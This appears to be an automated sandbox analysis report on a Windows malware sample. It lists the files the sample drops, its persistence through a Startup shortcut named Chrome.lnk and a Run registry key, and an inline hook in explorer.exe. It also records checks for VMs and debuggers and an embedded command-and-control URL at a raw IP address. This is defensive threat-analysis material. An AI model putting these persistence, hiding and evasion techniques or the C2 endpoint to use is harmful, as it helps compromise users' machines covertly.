Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901212652.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr
Source:	Binary string: ucrtbase.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903601715.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900804995.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905432478.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907164099.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908502115.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935221826.00007FFE126E1000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902399455.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905810924.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905141796.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906781587.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900933834.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904181487.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900525762.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901075570.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906461202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904577622.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.8.dr
Source:	Binary string: ucrtbase.pdbUGP source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908933126.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901491052.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905286921.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903999756.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900668023.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906129171.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1934115016.00007FFDFB98D000.00000002.00000001.01000000.0000000B.sdmp, python38.dll.8.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903212710.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907852039.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904391027.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903807898.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1909129219.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904766573.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905638202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904955189.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901347580.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908018909.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902885369.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902687569.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907351373.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908752595.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.8.dr

Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: ucrtbase.dll.8.dr

Static PE information: 0x81CF5D89 [Wed Jan 5 14:32:41 2039 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

PE file contains sections with non-standard names

Source: libcrypto-1_1.dll.8.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\explorer.exe	Code function: 2_2_07DBA595 push rcx; ret	2_2_07DBA5A8
Source: C:\Windows\explorer.exe	Code function: 2_2_07DBA572 push rcx; ret	2_2_07DBA5A8
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18C8 push rcx; retf	2_2_09CC18CA
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18E0 push rcx; retf	2_2_09CC18E2
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18F8 push rcx; retf	2_2_09CC18FA
Source: C:\Windows\explorer.exe	Code function: 2_2_09CCC395 push rcx; ret	2_2_09CCC3A8
Source: C:\Windows\explorer.exe	Code function: 2_2_09CCC372 push rcx; ret	2_2_09CCC3A8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C383108 push rsp; retf 0003h	2_2_0C383111
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36C267 push rax; iretd	2_2_0C36C268
Source: C:\Windows\explorer.exe	Code function: 2_2_0C383AA2 push rsp; retf 0003h	2_2_0C383BE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3832DA push rax; iretd	2_2_0C3832F1
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1CE67 push rax; iretd	2_2_0FC1CE68
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35DE8 push rax; ret	2_2_0FC35DE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35D08 push rax; ret	2_2_0FC35D09
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC34CA2 push rsp; retf 0003h	2_2_0FC34DE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35B78 push rax; ret	2_2_0FC35B79
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC39688 pushfq ; ret	2_2_0FC396C2
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC3965A pushfq ; ret	2_2_0FC39662
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC3966A pushfq ; ret	2_2_0FC39672
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC344DA push rax; iretd	2_2_0FC344F1
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC34308 push rsp; retf 0003h	2_2_0FC34311
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01300200 push rdi; ret	11_2_00007FFE01300206
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FA096 push rdi; ret	11_2_00007FFE012FA0A2
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FA5B5 push rdi; ret	11_2_00007FFE012FA5BB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FFAED push rdi; ret	11_2_00007FFE012FFAF4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321CB1B push rbp; retf	11_2_00007FFE1321CB28

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	File created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH5EE3.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH8363.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\THA35F.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\THC2BE.TMP

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Contain functionality to detect virtual machines

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	0_2_00007FF6E1703C9C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	3_2_00007FF699AB3C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	4_2_00007FF7536F3C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	7_2_00007FF736B53C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	13_2_00007FF7F4E73C9C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svchost.exe	Binary or memory string: PROCESSHACKER.EXE
Source: svchost.exe	Binary or memory string: X64DBG.EXE
Source: fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/L
Source: fNzx1wx8tL.exe	Binary or memory string: WCSCPYMSVCRT.DLLWCSCATWCSCMPWCSNCPYWCSLENSTRLENREALLOCFREEWCSSTRCLOSEHANDLEKERNEL32.DLLCREATEFILEWFREELIBRARYMOVEFILEWGETFILESIZEEXGETWINDOWSDIRECTORYAGETVOLUMEINFORMATIONAGETTICKCOUNTWSPRINTFWUSER32.DLLWSPRINTFAVIRTUALALLOCREADFILESLEEPVIRTUALFREESETFILEPOINTERCREATEDIRECTORYWFINDFIRSTFILEWFINDNEXTFILEWFINDCLOSECOPYFILEWWRITEFILEGETSYSTEMDIRECTORYWEXITPROCESSCREATEPROCESSWSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWGETSHORTPATHNAMEWGETENVIRONMENTVARIABLEWINTERNETOPENWWININET.DLLINTERNETOPENURLWHTTPQUERYINFOAINTERNETREADFILEINTERNETCONNECTWHTTPOPENREQUESTWHTTPSENDREQUESTAINTERNETCLOSEHANDLESHGETFOLDERPATHWSHGETFOLDERPATHASHGETKNOWNFOLDERPATHPATHISURLWSHLWAPI.DLLPATHCOMBINEWPATHFINDFILENAMEWREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAREGSETVALUEEXAREGCLOSEKEYOPENPROCESSTOKENGETTOKENINFORMATIONADJUSTTOKENPRIVILEGESGETUSERNAMEWLOOKUPPRIVILEGEVALUEACOUNINITIALIZEOLE32.DLLCOCREATEINSTANCECOINITIALIZEMESSAGEBOXAMOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64) APPLEWEBKIT/537.36 (KHTML, LIKE GECKO) CHROME/129.0.0.0 